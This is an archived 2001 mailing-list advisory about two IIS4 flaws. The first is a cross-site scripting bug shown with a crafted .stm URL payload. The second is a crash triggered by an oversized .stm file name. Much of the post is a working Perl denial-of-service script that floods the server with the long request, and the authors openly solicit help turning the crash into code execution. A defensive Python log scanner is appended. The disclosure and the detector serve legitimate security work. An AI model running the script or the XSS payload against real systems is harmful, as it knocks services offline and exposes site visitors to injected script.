Vulnerability Development mailing list archives

New D.O.S on IIS4 & a new cross site scripting vuln


From: "Admin [iSecureLabs]" <admin () ISECURELABS COM>
Date: Thu, 29 Mar 2001 16:55:08 +0200

--[ iSecureLabs.com French Security Team ]--


We have found 2 vulnerabilities in Microsoft IIS4
- Cross Site Scripting
- D.O.S

--[ The first one:
It is a cross-site scripting issue; using this crafted URL
http://server.com/foo/<script>alert('test')</script>.stm
it will execute the JavaScript code on your computer.

--[ The second one:
By requesting a .stm file 500 characters long several times
(http://server.com/foo/[a x 500].stm) the IIS4 server crashes.
Perhaps it is possible to use this vulnerability to execute arbitrary code.
We are currently working on a way to exploit this vulnerability.
If someone wants to help us, it is ok ;-)

Here is the exploit for the D.O.S one:

---<cut>---

#!/usr/bin/perl
# IIS4 .STM D.O.S by aurelien.cabezon () iSecureLabs com - http://www.iSecureLabs.com

use IO::Socket;

if (@ARGV <2){print "Usage: ./stm.pl <host> <port>\n"; exit;}

$overflow = "a" x 500;

sub connect()
{

$Socket= IO::Socket::INET->new(Proto=>"TCP",
                             PeerAddr=>$ARGV[0],
                             PeerPort=>"$ARGV[1]",)
                             or die "Connection impossible a $ARGV[0] : f$!\n";

        $Socket -> autoflush(1);

        print $Socket "GET /foo/$overflow.stm HTTP/1.0\n\n";


        print " \n\n> GET $ARGV[0]/foo/$overflow.stm HTTP/1.0\n\n";

        print " > Server response:\n\n";

                while(<$Socket>){

                        chomp ($reponse = <$Socket>);
                        print "$reponse\n";

                                }

        print "\n> Data Sent. Server crashed.\n";


close $Socket;

}
&connect;

---<cut>---

Cabezon Aurélien
aurelien.cabezon () iSecureLabs com
http://www.iSecureLabs.com
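
For defenders reviewing web logs, the two request shapes described in this post (markup inside a .stm path, and a very long .stm file name requested repeatedly) can be counted per client. This is an added example, not part of the original post; the log layout, the 200-character threshold, the function names and the sample lines are all assumptions constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Assumed log shape: client address first, request line in double quotes.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/\d\.\d"')
MAX_STM_NAME = 200  # assumed threshold; the name in the post is 500 characters

def classify(target):
    """Return the findings for one logged request target."""
    path = unquote(target.split("?", 1)[0])  # decode %3C and similar once
    if not path.lower().endswith(".stm"):
        return []
    findings = []
    if "<" in path or ">" in path:
        findings.append("markup-in-path")
    name = path.rsplit("/", 1)[-1]
    if len(name) - len(".stm") >= MAX_STM_NAME:
        findings.append("long-stm-name")
    return findings

def scan(lines):
    """Count findings per client so repeated requests stand out."""
    per_client = defaultdict(Counter)
    for line in lines:
        m = REQUEST.match(line)
        if m:
            per_client[m.group(1)].update(classify(m.group(2)))
    # Drop clients whose requests produced no findings.
    return {client: dict(c) for client, c in per_client.items() if c}

# Constructed sample lines (documentation addresses, made-up status codes).
STAMP = "- - [29/Mar/2001:16:55:08 +0200]"
LONG_NAME = "a" * 500
SAMPLE = [
    '192.0.2.10 ' + STAMP + ' "GET /default.stm HTTP/1.0" 200 512',
    '203.0.113.5 ' + STAMP
    + ' "GET /foo/%3Cscript%3Ealert(\'test\')%3C/script%3E.stm HTTP/1.0" 404 310',
] + ['198.51.100.7 ' + STAMP + ' "GET /foo/' + LONG_NAME + '.stm HTTP/1.0" 500 0'] * 3

if __name__ == "__main__":
    for client, counts in scan(SAMPLE).items():
        print(client, counts)
```

The path is decoded only once, so double-encoded input would need a second pass before the markup check.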

